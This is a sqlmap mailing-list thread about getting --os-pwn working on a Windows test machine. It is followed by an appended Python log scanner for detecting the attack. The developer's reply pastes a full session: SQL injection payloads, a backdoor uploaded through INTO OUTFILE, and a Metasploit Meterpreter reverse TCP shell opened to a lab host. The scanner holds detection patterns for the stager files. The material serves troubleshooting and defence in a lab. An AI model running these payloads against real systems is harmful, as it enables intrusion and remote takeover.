Re: [sqlmap-users] mysql os-pwn options on windows
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
In your case, the problem is the --tmp-path. Have you manually set it to
"/tmp"? If so, it is wrongly set to a Linux path, while you should set it to
a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of
temporary files directory).
Bye
On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <
mir...@gm...> wrote:
> $ sudo python sqlmap.py -u "
> http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
> [sudo] password for stamparm:
> _
> ___ ___| |_____ ___ ___ {1.0.4.21#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:11:45
>
> [09:11:45] [WARNING] you did not provide the local path where Metasploit
> Framework is installed
> [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
> installation inside the environment path(s)
> [09:11:45] [INFO] Metasploit Framework has been found installed in the
> '/usr/bin' path
> [09:11:45] [INFO] resuming back-end DBMS 'mysql'
> [09:11:45] [INFO] testing connection to the target URL
> [09:11:45] [INFO] heuristics detected web page charset 'ascii'
> [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=1 AND 2546=2546
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
> BY clause
> Payload: id=1 AND (SELECT 8079 FROM(SELECT
> COUNT(*),CONCAT(0x7178767071,(SELECT
> (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
> Type: AND/OR time-based blind
> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
> Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)
>
> Type: UNION query
> Title: Generic UNION query (NULL) - 3 columns
> Payload: id=1 UNION ALL SELECT
> NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
> epjZ
> ---
> [09:11:45] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [09:11:45] [INFO] fingerprinting the back-end DBMS operating system
> [09:11:45] [INFO] the back-end DBMS operating system is Windows
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> >
> [09:11:46] [INFO] going to use a web backdoor to establish the tunnel
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> >
> [09:11:47] [WARNING] unable to retrieve automatically the web server
> document root
> what do you want to use for writable directory?
> [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
> [2] custom location(s)
> [3] custom directory list file
> [4] brute force search
> > 1
> [09:12:02] [WARNING] unable to automatically parse any web server path
> [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
> LIMIT 'LINES TERMINATED BY' method
> [09:12:02] [INFO] the file stager has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
> [09:12:02] [INFO] the backdoor has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
> [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports between the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> >
> what is the local address? [Enter for '192.168.146.1' (detected)]
> which local port number do you want to use? [59643]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> >
> [09:12:04] [INFO] creation in progress ..... done
> [09:12:09] [INFO] uploading shellcodeexec to
> 'C:/Windows/Temp/tmpsehply.exe'
> [09:12:09] [INFO] shellcodeexec successfully uploaded
> [09:12:09] [INFO] running Metasploit Framework command line interface
> locally, please wait..
>
>
> http://metasploit.pro
>
>
> =[ metasploit v4.11.8-dev-a030179 ]
> + -- --=[ 1527 exploits - 880 auxiliary - 259 post ]
> + -- --=[ 437 payloads - 38 encoders - 8 nops ]
> + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
>
> PAYLOAD => windows/meterpreter/reverse_tcp
> EXITFUNC => process
> LPORT => 59643
> LHOST => 192.168.146.1
> [*] Started reverse TCP handler on 192.168.146.1:59643
> [*] Starting the payload handler...
> [09:12:18] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [09:12:23] [WARNING] turning off pre-connect mechanism because of
> connection time out(s)
> [*] Sending stage (957487 bytes) to 192.168.146.132
>
> meterpreter >
>
>
> On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...>
> wrote:
>
>> Hi all,
>>
>> I was just wondering, when I tried to do --os-pwn on sqlmap in my "DVWA
>> Windows machine"
>>
>> I got an error
>>
>> [WARNING] unable to upload the file through the web file stager to '/tmp'
>>
>> I wonder, is it only available for Linux OS?
>>
>> Thanks
>> Indra Z
>>
>> --
>> --from the net with zero space--
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
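
A defender's view of the session quoted above, as an added example that is not part of the original thread or of sqlmap: it scans web server access-log lines for the two artifacts visible in that output, the `INTO OUTFILE ... LINES TERMINATED BY` file write and requests to the dropped `tmp?????.php` scripts. The log lines are constructed, and the filename pattern is an assumption inferred from the two names in the output.

```python
import re
from urllib.parse import unquote_plus

# File-write primitive named in the log: "... INTO OUTFILE ... LINES TERMINATED BY ..."
OUTFILE_RE = re.compile(r"into\s+outfile\b.*?lines\s+terminated\s+by", re.I | re.S)
# Dropped scripts in the log are 'tmp' + 5 lowercase letters + '.php' (tmpuycdj.php,
# tmpbqtzu.php); the general pattern is an assumption inferred from those two names.
STAGER_RE = re.compile(r"/tmp[a-z]{5}\.php$")
# Apache common/combined access-log prefix: client, timestamp, request line, status.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify(line):
    """Return (client, rule, path) for a suspicious access-log line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    # Decode the query string so URL-encoded SQL keywords become matchable.
    if OUTFILE_RE.search(unquote_plus(query)):
        return (client, "sql-file-write", path)
    # A 200 means a file with a stager-like name exists and was served.
    if STAGER_RE.search(path) and status == "200":
        return (client, "stager-access", path)
    return None


def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (hosts and file names reused from the quoted output).
SAMPLE_LOG = [
    '192.168.146.1 - - [22/Apr/2016:09:12:02 +0200] "GET /test_environment/mysql/'
    'get_int.php?id=1+LIMIT+0%2C1+INTO+OUTFILE+%27C%3A%2Fxampp%2Fhtdocs%2F'
    'tmpuycdj.php%27+LINES+TERMINATED+BY+0x00 HTTP/1.1" 200 311',
    '192.168.146.1 - - [22/Apr/2016:09:12:02 +0200] "POST /tmpuycdj.php HTTP/1.1" 200 45',
    '192.168.146.1 - - [22/Apr/2016:09:12:09 +0200] "POST /tmpbqtzu.php HTTP/1.1" 200 12',
    '192.168.146.7 - - [22/Apr/2016:09:13:00 +0200] "GET /test_environment/mysql/'
    'get_int.php?id=1 HTTP/1.1" 200 298',
    '192.168.146.7 - - [22/Apr/2016:09:13:05 +0200] "GET /templates/index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, rule, path in scan(SAMPLE_LOG):
        print(f"{rule:15} {client:15} {path}")
```

On the database side, setting MySQL's `secure_file_priv` and not granting the `FILE` privilege to the application account removes the write primitive that the first rule looks for.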